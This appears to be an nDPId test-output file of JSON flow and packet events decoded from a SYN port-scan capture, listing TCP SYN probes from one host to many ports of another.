+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzsAACsGtjesEAAIQA2GNIzSBPfdUoMYAAAAAGACEAAjmAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs970AADoGFrWsEAAIQA2GNIzSPpDdUoMYAAAAAGACDADt\/gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs+JEAADEGHuGsEAAIQA2GNIzTGZPdU4MZAAAAAGACCAAW+QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs65oAACYGNtisEAAIQA2GNIzTCADdU4MZAAAAAGACDAAkjAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsOSQAACcG6E6sEAAIQA2GNIzTBAfdU4MZAAAAAGACEAAkhQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsMb0AADYG4LWsEAAIQA2GNIzTC9bdU4MZAAAAAGACDAAgtgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsLlAAAC0G7SKsEAAIQA2GNIzTH6PdU4MZAAAAAGACCAAQ6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADEGCmWsEAAIQA2GNIzTH0LdU4MZAAAAAGACCAARSgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/csAACYGJKesEAAIQA2GNIzTBRXdU4MZAAAAAGACDAAndwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsp+IAACkGd5CsEAAIQA2GNIzTAu3dU4MZAAAAAGACCAAtnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs3QAAADsGMHKsEAAIQA2GNIzTI43dU4MZAAAAAGACEAAE\/wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsaMEAACoGtbGsEAAIQA2GNIzTFrLdU4MZAAAAAGACDAAV2gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsytsAADUGSJesEAAIQA2GNIzTF2\/dU4MZAAAAAGACCAAZHQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsCaYAACgGFs2sEAAIQA2GNIzTGnvdU4MZAAAAAGACBAAaEQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VgAADIGIRqsEAAIQA2GNIzTJxTdU4MZAAAAAGACDAAFeAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsmN8AADoGdZOsEAAIQA2GNIzTHcndU4MZAAAAAGACDAAOwwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAswcUAADIGVK2sEAAIQA2GNIzTD0HdU4MZAAAAAGACDAAdSwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsRaYAACsG18ysEAAIQA2GNIzSBDvdUoMYAAAAAGACEAAkVAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsiPMAACwGk3+sEAAIQA2GNIzSIf3dUoMYAAAAAGACBAASkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+0YAADcGFiysEAAIQA2GNIzSDT7dUoMYAAAAAGACEAAbUQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/f0AAC8GG3WsEAAIQA2GNIzSB1PdUoMYAAAAAGACEAAhPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstrAAADgGWcKsEAAIQA2GNIzSBK\/dUoMYAAAAAGACBAAv4AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+94AACwGIJSsEAAIQA2GNIzSBrndUoMYAAAAAGACBAAt1gAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAskckAADoGfKmsEAAIQA2GNIzSKhrdUoMYAAAAAGACDAACdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
